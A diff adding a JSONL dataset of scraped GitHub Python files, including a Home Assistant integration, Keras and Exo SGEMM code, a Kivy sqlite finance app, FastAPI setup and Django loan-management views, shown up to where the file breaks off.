diff --git "a/5459.jsonl" "b/5459.jsonl" new file mode 100644--- /dev/null +++ "b/5459.jsonl" @@ -0,0 +1,2198 @@ +{"seq_id":"309402499","text":"\"\"\"Example Load Platform integration.\"\"\"\nfrom __future__ import annotations\n\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers.typing import ConfigType\n\nDOMAIN = 'example_load_platform'\n\n\ndef setup(hass: HomeAssistant, config: ConfigType) -> bool:\n \"\"\"Your controller/hub specific code.\"\"\"\n # Data that you want to share with your platforms\n hass.data[DOMAIN] = {\n 'temperature': 23\n }\n\n hass.helpers.discovery.load_platform('sensor', DOMAIN, {}, config)\n\n return True\n","repo_name":"home-assistant/example-custom-config","sub_path":"custom_components/example_load_platform/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":173,"dataset":"github-code","pt":"53"} +{"seq_id":"36851710182","text":"from pydantic import BaseModel\nfrom typing import Optional\n\n\nclass SearchRequest(BaseModel):\n \"\"\"\n \"\"\"\n\n name: str\n new_model: str\n limit: Optional[int] = 10\n round: Optional[int] = 2\n percent: Optional[float] = 50\n type: Optional[str] = \"database\"\n\n class Config:\n schema_extra = {\n \"example\": {\n \"name\": \"EquipmentModel\",\n \"new_model\": \"СКАТ-2400\",\n \"limit\": 10,\n \"round\": 2,\n \"percent\": 50,\n \"type\": \"database\"\n }\n }","repo_name":"oilgo/fuzzy_search","sub_path":"apps/search/schemas.py","file_name":"schemas.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"29391229109","text":"import numpy as np\nfrom keras import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation\nfrom keras.layers import Conv2D, MaxPool2D, Flatten\nfrom keras.optimizers import SGD, Adam\nfrom keras.utils import np_utils\nfrom keras.models import load_model\nimport sys, csv, time\nfrom hw8_train import normalization, MobileNet\n\n# import tensorflow as tf\n# config = tf.ConfigProto()\n# config.gpu_options.allow_growth = True\n# sess = tf.Session(config = config)\n\nstart = time.time()\n\ndef load_data(input) :\n x_test = []\n data = csv.reader(open(input))\n num = 0\n for row in data :\n if num == 0 :\n num += 1\n continue\n else :\n flat_array = np.array(row[1].split(' '), dtype = float)\n #tmp = np.reshape(flat_array, (48, 48, 1))\n #tmp = np.concatenate((tmp, tmp, tmp), axis=2)\n x_test.append(flat_array)\n \n x_test = np.array(x_test)\n x_test = normalization(x_test)\n x_test = np.reshape(x_test, (-1, 48, 48, 1))\n return x_test\n\ndef test(x_test, modelfile) :\n model = MobileNet(include_top=False, weights=None, input_shape=(48, 48, 1), alpha=1, classes=7, pooling='avg')\n model.summary()\n model.load_weights(modelfile)\n\n x_valid, y_valid = np.load('x_valid.npy'), np.load('y_valid.npy') \n score = model.evaluate(x_valid, y_valid)\n print ('Total loss on validation data :', score[0])\n print ('Accuracy of validation data :', score[1])\n \n result = model.predict(x_test)\n result = np.argmax(result, axis=1)\n return result\n\ndef write(filename, data) :\n outfile = open(filename, 'w')\n writer = csv.writer(outfile)\n writer.writerow(['id', 'label'])\n for i in range(data.shape[0]) :\n id = i\n label = data[i]\n writer.writerow([id, label])\n outfile.close()\n\nif __name__ == \"__main__\":\n modelfile = './weightsfile.h5'\n x_test = load_data(sys.argv[1])\n #x_test = normalization(x_test)\n result = test(x_test, modelfile)\n write(sys.argv[2], result)\n\nend = time.time()\nt = end - start\nprint('')\nprint(\"Time taken: \", t, \"seconds.\")","repo_name":"adamlin09/ML2019SPRING","sub_path":"hw8/hw8_test.py","file_name":"hw8_test.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74019682727","text":"#pg 27 Problem 9\n\nnum1 = float(input(\"Please enter the first number: \"))\nnum2 = float(input(\"Please enter the second number: \"))\nprint(round(num1 * num2, 2))\nprint(round(num1 + num2, 2))\n\n\n#pg 27 Problem 10\nnum = 1\nsum1 = 0\ncount = 0\nwhile num != 0:\n sum = int(input(\"Please enter in a number: \"))\n sum1 += sum\n count = count + 1\n yn = int(input(\"Would you like to enter in another number to add? If no enter 0, if yes enter 1: \"))\n if yn == 1: num = num\n else: num = num - 1\nprint(\"The average of these numbers are\", sum1/count)\n","repo_name":"Goodnews888/DITP-2021","sub_path":"Loops/12_loop_challenges.py","file_name":"12_loop_challenges.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39251044814","text":"import random\n\nfrom PIL import Image\n\n\ndef tarnslate_photo_on_treatment(photo):\n img = Image.open(photo)\n im = Image.new('RGB', (img.size[0], 300), (255, 255, 255))\n\n bwidth, bheight = img.size[0], img.size[1]\n fwidth, fheight = im.size[0], im.size[1]\n x, y = 0, bheight - fheight # в левый нижний\n img.paste(im, (x, y))\n\n img.save(f'/Users/macbookpro/Documents/PhotoOptimazerPy/PHOTO/TREATMENT/photo_{random.randint(0, 9999)}.jpg')\n\n","repo_name":"TshalabaevCaspianLabs/PhotoOptimazerPy","sub_path":"PHOTO/DELETE_WATEMARK.py","file_name":"DELETE_WATEMARK.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12159713189","text":"\"\"\"Application module.\"\"\"\nfrom fastapi import FastAPI\nfrom .containers import Container\nfrom .routers import main_router\nfrom fastapi.middleware.cors import CORSMiddleware\n\napp = FastAPI()\napp.add_middleware(\n CORSMiddleware,\n allow_origins=['http://localhost:4000'],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"Content-Type\", \"Set-Cookie\"]\n)\napp.include_router(main_router)\n\ncontainer = Container()\ncontainer.config.redis_host.from_env(\"REDIS_HOST\", \"localhost\")\ncontainer.config.redis_password.from_env(\"REDIS_PASSWORD\", \"password\")\ncontainer.wire(packages=[\n '.endpoints',\n '.utils'\n])\n","repo_name":"Semolik/ASUtimetable","sub_path":"api/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36422273138","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 8 14:39:19 2019\n\n@author: ameya\n\"\"\"\n\nimport sqlite3\nimport datetime\nimport kivy\nkivy.require(\"1.10.1\")\nfrom kivy.app import App\nfrom kivy.uix.screenmanager import Screen, ScreenManager\nfrom kivy.lang.builder import Builder\nfrom kivy.properties import ObjectProperty, ListProperty, BooleanProperty\nfrom kivy.uix.popup import Popup\nfrom kivy.uix.listview import ListView\nfrom kivy.uix.recycleview import RecycleView\nfrom kivy.uix.recycleboxlayout import RecycleBoxLayout\nfrom kivy.uix.recyclegridlayout import RecycleGridLayout\nfrom kivy.uix.recycleview.views import RecycleDataViewBehavior\nfrom kivy.uix.label import Label\n\nconn = sqlite3.connect('Amity Ramapriya Finances.db')\nc = conn.cursor()\nnow = datetime.datetime.now()\nBuilder.load_file(\"ARAFin.kv\")\n# DATABASE STORAGE AND MANIPULATION FUNCTIONS FOR RESIDENTS\ndef create_table_accounts():\n with conn:\n c.execute(\"\"\"CREATE TABLE Accounts (\n Name TEXT,\n PhoneNo INTEGER,\n BlockNo TEXT,\n FlatNo INTEGER ,\n Balance REAL,\n Initialisation_Date TEXT,\n Transactions TEXT\n )\"\"\")\n\ndef create_table_transactions():\n with conn:\n c.execute(\"\"\"CREATE TABLE Transactions(\n T_ID INT PRIMARY KEY AUTO_INCREMENT,\n From INTEGER,\n To INTEGER,\n Amount REAL,\n Transaction_Date TEXT,\n Mode TEXT\n )\"\"\")\ndef add_new_res(details):\n with conn:\n c.execute(\"INSERT INTO Accounts VALUES (:Name, :PhoneNo, :BlockNo, :FlatNo, :Balance, :Initialisation_Date, :Transactions)\", details)\n\ndef update_res(details):\n with conn:\n c.execute(\"\"\"UPDATE Accounts\n SET Name = ?, PhoneNo = ?, BlockNo = ?, Balance = ?\n WHERE FlatNo = ?\"\"\", (details['Name'], details['PhoneNo'], details['BlockNo'], details['Balance'], details['FlatNo']))\ndef view_res():\n with conn:\n c.execute(\"SELECT Name, PhoneNo, BlockNo, FlatNo, Balance FROM Accounts\")\n rows = c.fetchall()\n print(rows)\n return rows\n \ndef delete_res(flatNo):\n with conn:\n c.execute(\"\"\"DELETE FROM Accounts WHERE FlatNo = ?\"\"\", (flatNo,))\n# END OF DATABASE STORAGE AND MANIPULATION FUNCTIONS FOR RESIDENTS\n\n#HOME SCREEN DEFINITION\nclass HomeScreen(Screen):\n pass\n#Failed user register popup\nclass FailRegisterPopup(Popup):\n pass\n\nclass SuccessRegisterPopup(Popup):\n pass\n\n#ADD RESIDENT DEFINITION\nclass AddResidentScreen(Screen):\n nameRes = ObjectProperty()\n phoneNo = ObjectProperty()\n blockNo = ObjectProperty()\n flatNo = ObjectProperty()\n balance = ObjectProperty()\n errorname = ObjectProperty()\n errorphno = ObjectProperty()\n errorblockno = ObjectProperty()\n errorflatno = ObjectProperty()\n errorbalance = ObjectProperty()\n \n def reset_errors(self):\n self.errorname.text = \"\"\n self.errorphno.text = \"\"\n self.errorblockno.text = \"\"\n self.errorflatno.text = \"\"\n self.errorbalance.text = \"\"\n def reset_text_input(self):\n self.nameRes.text = \"\"\n self.phoneNo.text = \"\"\n self.blockNo.text = \"\"\n self.flatNo.text = \"\"\n self.balance.text = \"\" \n def validate_input(self, details):\n validate_dict = {'Name': True, 'PhoneNo': True, 'FlatNo': True, 'Balance': True, 'BlockNo': True}\n valid_blocks = ['A', 'B', 'C']\n if len(details['Name']) == 0:\n validate_dict['Name'] = False\n if str(details['PhoneNo']).isdigit() == False:\n validate_dict['PhoneNo'] = False\n elif len(str(details['PhoneNo'])) != 10:\n validate_dict['PhoneNo'] = False\n if details['BlockNo'].upper() not in valid_blocks:\n validate_dict['BlockNo'] = False\n fno = str(details['FlatNo'])\n if len(fno) != 3:\n validate_dict['FlatNo'] = False\n elif fno.isdigit() == False:\n validate_dict['FlatNo'] = False\n elif int(fno[0]) > 4 or int(fno[0]) < 0:\n validate_dict['FlatNo'] = False\n elif int(fno[1:3]) > 12 or int(fno[1:3]) < 0:\n validate_dict['FlatNo'] = False\n if details['Balance'] == \"\":\n validate_dict['Balance'] = False\n elif details['Balance'].isdigit() == False:\n validate_dict['Balance'] = False\n elif float(details['Balance']) < 0:\n validate_dict['Balance'] = False\n return validate_dict\n \n def submit(self):\n all_ok = True\n self.reset_errors()\n details = {}\n details['Name'] = self.nameRes.text.rstrip()\n details['PhoneNo'] = self.phoneNo.text.rstrip()\n details['BlockNo'] = self.blockNo.text.rstrip()\n details['FlatNo'] = self.flatNo.text.rstrip()\n details['Balance'] = self.balance.text.rstrip()\n details['Initialisation_Date'] = now.strftime(\"%d-%m-%Y\")\n details['Transactions'] = \"\"\n validated = self.validate_input(details)\n if not validated['Name']:\n self.errorname.text = \"Please Enter Correct Name\"\n all_ok = False\n if not validated['PhoneNo']:\n self.errorphno.text = \"Enter a valid Phone Number\"\n all_ok = False\n if not validated['BlockNo']:\n self.errorblockno.text = \"Enter Valid Block\"\n all_ok = False\n if not validated['FlatNo']:\n self.errorflatno.text = \"Enter Valid Flat no\"\n all_ok = False\n if not validated['Balance']:\n self.errorbalance.text = \"Enter valid Balance\"\n all_ok = False\n if all_ok:\n details['FlatNo'] = int(details['FlatNo'])\n details['Balance'] = float(details['Balance'])\n details['PhoneNo'] = int(details['PhoneNo'])\n c.execute(\"SELECT *FROM Accounts WHERE FlatNo = ?\",(details['FlatNo'],))\n rows = c.fetchall()\n if len(rows) == 1:\n print(\"Resident Details already exists\")\n popupmsg = FailRegisterPopup()\n popupmsg.open()\n \n else:\n add_new_res(details)\n successpopup = SuccessRegisterPopup()\n successpopup.open()\n self.reset_text_input()\n self.reset_errors()\n print(\"Resident added\")\n #root.manager.current = \"Home\"\n#DATATTYPES OF BALANCE AND FLAT NO HAVE TO BE CHANGED\nclass SelectableLabel(Label):\n ''' Add selection support to the Label '''\n pass\n \nclass ViewRegisteredResidentsScreen(Screen):\n data_items = ListProperty([])\n def __init__(self, **kwargs):\n super(ViewRegisteredResidentsScreen, self).__init__(**kwargs)\n self.loaddataintolist()\n def loaddataintolist(self):\n rows = view_res()\n for row in rows:\n for col in row:\n self.data_items.append(col)\n \n \n \nclass Screen_Manager(ScreenManager):\n pass\napp = Screen_Manager()\napp.add_widget(HomeScreen())\napp.add_widget(AddResidentScreen())\n#app.add_widget(ViewRegisteredResidentsScreen(name = \"viewres\"))\nclass ARAFinaApp(App):\n def build(self):\n return app\n \nif __name__ == '__main__':\n Finances = ARAFinaApp()\n Finances.run()","repo_name":"ameyaditya/financeswebapp","sub_path":"amity ramapriya finances Desktop App/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":7414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35670684409","text":"from collections import deque\nt = int(input())\nfor i in range(t):\n c = 0\n n, k = map(int, input().split())\n l = list(map(int, input().split()))\n x = deque()\n y = deque()\n for j in range(n):\n x.append(l[j])\n y.append(j)\n while True:\n if x[0] == max(list(x)):\n x.popleft()\n d = y.popleft()\n c += 1\n if d == k:\n print(c)\n break\n continue\n else:\n x.append(x.popleft())\n y.append(y.popleft())\n\n","repo_name":"jjun-ni/jjun-ni","sub_path":"venv/구현/1966.py","file_name":"1966.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13642570306","text":"from django.shortcuts import render, redirect\nfrom django.urls import reverse_lazy, reverse\nfrom django.views.generic import UpdateView, CreateView, DeleteView\nfrom datetime import datetime\nimport calendar\nfrom decimal import Decimal\nfrom debts.models import (\n CustomerItemLoan, CustomerMoneyLoan, ItemBorrowed, \n MoneyLoanPayment, ItemLoanPayment, LoanApplication\n)\nfrom core.models import Inventory\n\nfrom .forms import MoneyLoanPaymentForm, LoanApplicationForm, ItemBorrowedForm\nfrom users.models import Customer\n\ndate_today = datetime.now().date()\n\n# Create your views here.\ndef loans(request):\n return render(request, \"loans/loans.html\")\n\n\ndef loan_applications(request):\n loan_applications = LoanApplication.objects.all().order_by(\"-created\")\n context = {\n \"loan_applications\": loan_applications\n }\n return render(request, \"loans/loan_applications.html\", context)\n\n\ndef resubmit_loan_application(request, pk):\n loan_application = LoanApplication.objects.get(id=pk)\n loan_application.status = \"Pending\"\n loan_application.save()\n return redirect(\"loan-applications\")\n\n\ndef approve_loan_application(request, pk):\n loan_application = LoanApplication.objects.get(id=pk)\n loan_application.status = \"Approved\"\n loan_application.save()\n return redirect(\"loan-applications\")\n\n\ndef disburse_loan_application(request, pk):\n loan_application = LoanApplication.objects.get(id=pk)\n\n if request.method == \"POST\":\n amount_awarded = Decimal(request.POST.get(\"amount_awarded\"))\n customer = loan_application.customer\n interest_percent = Decimal(request.POST.get(\"interest\"))\n\n interest_accrued = (interest_percent / 100) * amount_awarded\n date_awarded = request.POST.get(\"date_awarded\")\n expected_repay_date = request.POST.get(\"expected_repay_date\")\n\n loan = CustomerMoneyLoan(\n customer=customer,\n amount_awarded=amount_awarded,\n interest_accrued=interest_accrued,\n date_awarded=date_awarded,\n expected_repay_date=expected_repay_date,\n status=\"Paying\",\n amount_repaid=0\n )\n loan.save()\n\n loan_application.disburse = True\n loan_application.save()\n\n return redirect(reverse(\"money-loan-detail\", kwargs={\"loan_id\": loan.id}))\n \n context = {\n \"loan_application\": loan_application\n }\n\n return render(request, \"loans/disburse_loan.html\", context)\n\n\nclass LoanApplyView(CreateView):\n model = LoanApplication\n form_class = LoanApplicationForm\n template_name = \"loans/apply_loan.html\"\n \n\ndef decline_loan_application(request, pk):\n loan_application = LoanApplication.objects.get(id=pk)\n loan_application.status = \"Declined\"\n loan_application.save()\n return redirect(\"loan-applications\")\n\n\ndef customer_item_loans(request, customer_id=None):\n item_loans = CustomerItemLoan.objects.all().order_by(\"-created\")\n\n if customer_id:\n item_loans = CustomerItemLoan.objects.filter(customer__id=customer_id).order_by(\"-created\")\n\n context = {\n \"item_loans\": item_loans\n }\n return render(request, \"loans/item_loans.html\", context)\n\n\ndef item_loan_payments(request, loan_id=None):\n items_loan_payments = ItemLoanPayment.objects.all().order_by(\"-created\")\n\n customer_id = None\n\n if loan_id:\n items_loan_payments = ItemLoanPayment.objects.filter(loan__id=loan_id).order_by(\"-created\")\n\n loan = CustomerItemLoan.objects.get(id=loan_id)\n customer_id = loan.customer.id\n\n\n context = {\n \"loan_payments\": items_loan_payments,\n \"loan_id\": loan_id,\n \"customer_id\": customer_id\n }\n return render(request, \"loans/items_loan_payments.html\", context)\n\n\ndef customer_item_loan_detail(request, loan_id=None):\n loan = CustomerItemLoan.objects.get(id=loan_id)\n\n if loan_id:\n item_loan_payments = ItemLoanPayment.objects.filter(loan__id=loan_id).order_by(\"-created\")\n borrowed_items = ItemBorrowed.objects.filter(customer=loan.customer)\n\n context = {\n \"loan\": loan,\n \"loan_payments\": item_loan_payments,\n \"borrowed_items\": borrowed_items\n }\n return render(request, \"loans/item_loan.html\", context)\n\n\n\ndef pay_item_loan(request, customer_id=None, loan_id=None):\n customer = Customer.objects.get(id=customer_id)\n loan = CustomerItemLoan.objects.get(id=loan_id)\n\n name = f\"{customer.first_name} {customer.last_name}\"\n \n if request.method == \"POST\":\n amount = request.POST.get(\"amount\")\n payment = ItemLoanPayment(loan=loan, customer=customer, amount=amount)\n payment.save()\n\n loan.amount_repaid += Decimal(amount)\n loan.save()\n\n return redirect(reverse(\"item-loan-detail\", kwargs={\"loan_id\": loan_id}))\n \n context = {\n \"name\": name,\n \"loan\": loan\n }\n\n \n return render(request, \"loans/payments/pay_item_loan.html\", context)\n\n\ndef new_item_loan(request, customer_id=None):\n try:\n customer = Customer.objects.get(id=customer_id)\n loan = CustomerItemLoan(\n customer=customer,\n amount_borrowed=0,\n amount_repaid=0\n )\n loan.save()\n return redirect(reverse(\"customer-detail\", kwargs={\"pk\": customer_id}))\n except Exception as e:\n raise e\n\ndef new_loan_item(request, loan_id=None, customer_id=None):\n form = ItemBorrowedForm(request.POST or None)\n try:\n customer = Customer.objects.get(id=customer_id)\n loan = CustomerItemLoan.objects.get(id=loan_id)\n\n if request.method == \"POST\":\n item_id = int(request.POST.get(\"item\"))\n quantity = Decimal(request.POST.get(\"quantity\"))\n\n year = str(date_today.year)\n month = calendar.month_name[date_today.month]\n\n item = Inventory.objects.get(id=item_id)\n\n\n print(f\"Item: {item.name}, Quantity: {quantity}\")\n\n borrowed_item = ItemBorrowed(\n customer=customer,\n item=item,\n quantity=quantity,\n year=year,\n month=month\n )\n\n borrowed_item.save()\n borrowed_amount = item.unit_price * quantity\n\n loan.amount_borrowed += borrowed_amount\n loan.save()\n\n item.stock -= quantity\n item.save()\n \n return redirect(reverse(\"item-loan-detail\", kwargs={\"loan_id\": loan_id}))\n\n except Exception as e:\n raise e\n\n return render(request, \"loans/item_loans/loan_item.html\", {\"form\": form})\n\ndef borrowed_items(request):\n borrowed_items = ItemBorrowed.objects.all().order_by(\"-created\")\n context = {\n \"borrowed_items\": borrowed_items\n }\n return render(request, \"loans/borrowed_items.html\", context)\n\n\ndef customer_money_loans(request, customer_id=None):\n money_loans = CustomerMoneyLoan.objects.all().order_by(\"-created\")\n\n if customer_id:\n money_loans = CustomerMoneyLoan.objects.filter(customer__id=customer_id).order_by(\"-created\")\n\n context = {\n \"money_loans\": money_loans\n }\n return render(request, \"loans/money_loans.html\", context)\n\n\ndef customer_money_loan_detail(request, loan_id=None):\n loan = CustomerMoneyLoan.objects.get(id=loan_id)\n\n if loan_id:\n money_loan_payments = MoneyLoanPayment.objects.filter(loan__id=loan_id).order_by(\"-created\")\n\n context = {\n \"loan\": loan,\n \"loan_payments\": money_loan_payments\n }\n return render(request, \"loans/money_loan.html\", context)\n\n\n\ndef money_loan_payments(request, loan_id=None):\n money_loan_payments = MoneyLoanPayment.objects.all().order_by(\"-created\")\n\n customer_id = None\n\n if loan_id:\n money_loan_payments = MoneyLoanPayment.objects.filter(loan__id=loan_id).order_by(\"-created\")\n\n loan = CustomerMoneyLoan.objects.get(id=loan_id)\n customer_id = loan.customer.id\n\n\n context = {\n \"loan_payments\": money_loan_payments,\n \"loan_id\": loan_id,\n \"customer_id\": customer_id\n }\n return render(request, \"loans/money_loan_payments.html\", context)\n\n\ndef pay_money_loan(request, customer_id=None, loan_id=None):\n\n customer = Customer.objects.get(id=customer_id)\n loan = CustomerMoneyLoan.objects.get(id=loan_id)\n\n name = f\"{customer.first_name} {customer.last_name}\"\n \n if request.method == \"POST\":\n amount = request.POST.get(\"amount\")\n payment = MoneyLoanPayment(loan=loan, customer=customer, amount=amount)\n payment.save()\n\n loan.amount_repaid += Decimal(amount)\n loan.save()\n\n return redirect(reverse(\"money-loan-detail\", kwargs={\"loan_id\": loan_id}))\n \n\n context = {\n \"name\": name,\n \"loan\": loan\n }\n\n \n return render(request, \"loans/payments/pay_money_loan.html\", context)","repo_name":"Paulndambo/Debt-Management-App","sub_path":"debts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72428582887","text":"from __future__ import annotations\n\nfrom exo import *\nfrom exo.libs.memories import DRAM_STATIC\nfrom exo.platforms.x86 import *\nfrom exo.syntax import *\nfrom exo.stdlib.scheduling import *\n\n\ndef reorder_up(p, stmt_pattern, n=1):\n for _ in range(n):\n c = p.find(stmt_pattern).expand(1, 0)\n p = reorder_stmts(p, c)\n return p\n\n\ndef fuse_after(p, stmt):\n c = p.find_loop(stmt)\n c2 = c.next()\n return fuse(p, c, c2)\n\n\n# noinspection PyPep8Naming\n@proc\ndef SGEMM(M: size, N: size, K: size, A: f32[M, K], B: f32[K, N], C: f32[M, N]):\n assert M >= 1\n assert N >= 1\n assert K >= 1\n assert stride(A, 1) == 1\n assert stride(B, 1) == 1\n assert stride(C, 1) == 1\n\n for k in seq(0, K):\n for i in seq(0, M):\n for j in seq(0, N):\n C[i, j] += A[i, k] * B[k, j]\n\n\ndef make_win(p):\n p = rename(p, \"SGEMM_WINDOW\")\n p = set_window(p, \"A\", True)\n p = set_window(p, \"B\", True)\n p = set_window(p, \"C\", True)\n return p\n\n\nSGEMM_WINDOW = make_win(SGEMM)\n\n# Constants for scheduling\nVEC_W = 16\n\nM_REG_BLK = 6\nN_REG_BLK = 4 * VEC_W\n\nM_L1_FAC = 44\nN_L1_FAC = 1\n\nM_L1_BLK = M_REG_BLK * M_L1_FAC\nN_L1_BLK = N_REG_BLK * N_L1_FAC\nK_L1_BLK = 512\n\nCOPY_STREAMS = 3\n\nbasic_kernel_Mx4 = {}\nsgemm_kernel_avx512_Mx4 = {}\nfor M in range(1, M_REG_BLK + 1):\n\n def make_basic(p):\n p = rename(p, f\"basic_kernel_{M}x4\")\n p = p.partial_eval(M, N_REG_BLK)\n p = simplify(p)\n return p\n\n basic_kernel_Mx4[M] = make_basic(SGEMM_WINDOW)\n # (\n # SGEMM_WINDOW\n # .rename(f'basic_kernel_{M}x4')\n # .partial_eval(M, N_REG_BLK)\n # .simplify()\n # )\n def make_avx512_kernel(p):\n p = rename(p, f\"sgemm_kernel_avx512_{M}x4\")\n # Vectorize columns\n p = divide_loop(p, \"j\", VEC_W, [\"jo\", \"ji\"], perfect=True)\n # Stage C for reduction\n p = stage_mem(p, \"C[_] += _\", f\"C[i, {VEC_W} * jo + ji]\", \"C_reg\")\n p = set_memory(p, \"C_reg\", AVX512)\n p = autolift_alloc(p, \"C_reg: _\", n_lifts=3, keep_dims=True)\n p = autolift_alloc(p, \"C_reg: _\")\n p = autofission(p, p.find(\"C_reg[_] = _\").after(), n_lifts=4)\n p = autofission(p, p.find(\"C[_] = _\").before(), n_lifts=4)\n # Stage A & B\n def stage_input(p, expr, new_buf):\n p = bind_expr(p, expr, new_buf)\n p = expand_dim(p, new_buf, 16, \"ji\")\n p = lift_alloc(p, new_buf)\n p = set_memory(p, new_buf, AVX512)\n p = fission(p, p.find(f\"{new_buf} = _\").after())\n return p\n\n p = stage_input(p, \"A[_]\", \"A_vec\")\n p = stage_input(p, \"B[_]\", \"B_vec\")\n # Schedule ops\n p = replace(p, \"for ji in _: _ #0\", mm512_loadu_ps)\n p = replace(p, \"for ji in _: _ #3\", mm512_storeu_ps)\n p = replace_all(p, mm512_set1_ps)\n p = replace_all(p, mm512_loadu_ps)\n p = replace_all(p, mm512_fmadd_ps)\n # LICM\n p = autolift_alloc(p, \"A_vec: _\", keep_dims=True)\n p = autofission(p, p.find(\"mm512_set1_ps(_)\").after())\n # Clean up\n p = simplify(p)\n print(p)\n return p\n\n sgemm_kernel_avx512_Mx4[M] = make_avx512_kernel(basic_kernel_Mx4[M])\n\n\ndef make_bottom_panel_kernel(p):\n p = rename(p, \"bottom_panel_kernel\")\n p = p.partial_eval(N=N_REG_BLK)\n p = p.add_assertion(\"M < 6\")\n p = simplify(p)\n return p\n\n\nbottom_panel_kernel = make_bottom_panel_kernel(SGEMM_WINDOW)\n\n\ndef make_bottom_panel_kernel_scheduled(p=bottom_panel_kernel):\n p = rename(p, \"bottom_panel_kernel_scheduled\")\n p = specialize(p, \"for k in _: _ #0\", [f\"M == {i}\" for i in range(1, M_REG_BLK)])\n p = simplify(p)\n for M in range(1, 6):\n p = replace_all(p, basic_kernel_Mx4[M])\n p = call_eqv(p, f\"basic_kernel_{M}x4(_)\", sgemm_kernel_avx512_Mx4[M])\n p = simplify(p)\n return p\n\n\nbottom_panel_kernel_scheduled = make_bottom_panel_kernel_scheduled()\n\n\ndef make_right_panel_kernel(p=SGEMM_WINDOW):\n p = rename(p, \"right_panel_kernel\")\n p = p.partial_eval(M=M_REG_BLK)\n p = p.add_assertion(\"N / 16 < 4\")\n p = simplify(p)\n return p\n\n\nright_panel_kernel = make_right_panel_kernel()\n\n\ndef make_right_panel_kernel_opt(p=right_panel_kernel):\n p = rename(p, \"right_panel_kernel_opt\")\n #\n p = stage_mem(p, \"C[_] += _\", \"C[i, j]\", \"C_reg\")\n p = divide_loop(p, \"j\", VEC_W, [\"jo\", \"ji\"], tail=\"cut\")\n p = bound_and_guard(p, \"for ji in _: _ #1\")\n p = fission(p, p.find(\"for jo in _: _\").after(), n_lifts=2)\n #\n p = autolift_alloc(p, \"C_reg: _\", n_lifts=3, keep_dims=True)\n p = autolift_alloc(p, \"C_reg: _ #1\", n_lifts=3, keep_dims=True)\n p = autolift_alloc(p, \"C_reg: _\")\n p = autolift_alloc(p, \"C_reg: _ #1\")\n p = reorder_up(p, \"C_reg : _ #1\")\n # p = reorder_stmts(p, 'for k in _ : _\\n'\n # 'C_reg: _')\n #\n p = autofission(p, p.find(\"C_reg[_] = _ #0\").after(), n_lifts=4)\n p = autofission(p, p.find(\"C_reg[_] = _ #1\").after(), n_lifts=4)\n p = autofission(p, p.find(\"C_reg[_] += _ #0\").after(), n_lifts=4)\n p = autofission(p, p.find(\"C_reg[_] += _ #1\").after(), n_lifts=4)\n #\n p = reorder_up(p, \"for i in _: _ #3\")\n p = reorder_up(p, \"for i in _: _ #2\")\n p = reorder_up(p, \"for k in _: _ #1\")\n #\n p = set_memory(p, \"C_reg\", AVX512)\n p = set_memory(p, \"C_reg #1\", AVX512)\n #\n def stage_input(p, expr, new_buf, n_lifts=1):\n p = bind_expr(p, expr, new_buf)\n p = expand_dim(p, new_buf, 16, \"ji\", unsafe_disable_checks=True)\n p = lift_alloc(p, new_buf, n_lifts=n_lifts)\n p = set_memory(p, new_buf, AVX512)\n p = fission(p, p.find(f\"{new_buf} = _\").after(), n_lifts=n_lifts)\n return p\n\n p = stage_input(p, \"A[_]\", \"A_reg\")\n p = stage_input(p, \"B[_]\", \"B_reg\")\n #\n p = replace_all(p, mm512_set1_ps)\n p = replace_all(p, mm512_fmadd_ps)\n p = replace(p, \"for ji in _:\\n\" \" C[_] = _\", mm512_storeu_ps)\n p = replace_all(p, mm512_loadu_ps)\n #\n p = replace(p, \"for ji in _: _ #0\", mm512_maskz_loadu_ps)\n p = replace(p, \"for ji in _: _ #1\", mm512_mask_storeu_ps)\n #\n p = stage_input(p, \"A[_] #1\", \"A_reg2\", n_lifts=2)\n p = stage_input(p, \"B[_] #1\", \"B_reg2\", n_lifts=2)\n #\n p = replace_all(p, mm512_mask_set1_ps)\n p = replace_all(p, mm512_mask_fmadd_ps)\n p = replace_all(p, mm512_maskz_loadu_ps)\n #\n for tgt in [\"i #0\", \"k #0\", \"i #1\", \"i #2\"]:\n p = fuse_after(p, tgt)\n #\n p = simplify(p)\n return p\n\n\nright_panel_kernel_opt = make_right_panel_kernel_opt()\n\n\ndef make_right_panel_kernel_scheduled(p=right_panel_kernel):\n p = rename(p, \"right_panel_kernel_scheduled\")\n p = replace_all(p, right_panel_kernel)\n #\n p = specialize(\n p,\n \"right_panel_kernel(_)\",\n [f\"(N / 16) == {i}\" for i in range(N_REG_BLK // VEC_W)],\n )\n #\n p = repeat(call_eqv)(p, \"right_panel_kernel(_)\", right_panel_kernel_opt)\n p = repeat(inline)(p, \"right_panel_kernel_opt\")\n #\n p = repeat(inline_window)(p, \"A = _\")\n p = repeat(inline_window)(p, \"B = _\")\n p = repeat(inline_window)(p, \"C = _\")\n #\n p = simplify(p)\n return p\n\n\nright_panel_kernel_scheduled = make_right_panel_kernel_scheduled()\n\n\ndef make_sgemm_above_kernel(p=SGEMM_WINDOW):\n p = rename(p, \"sgemm_above_kernel\")\n # Split 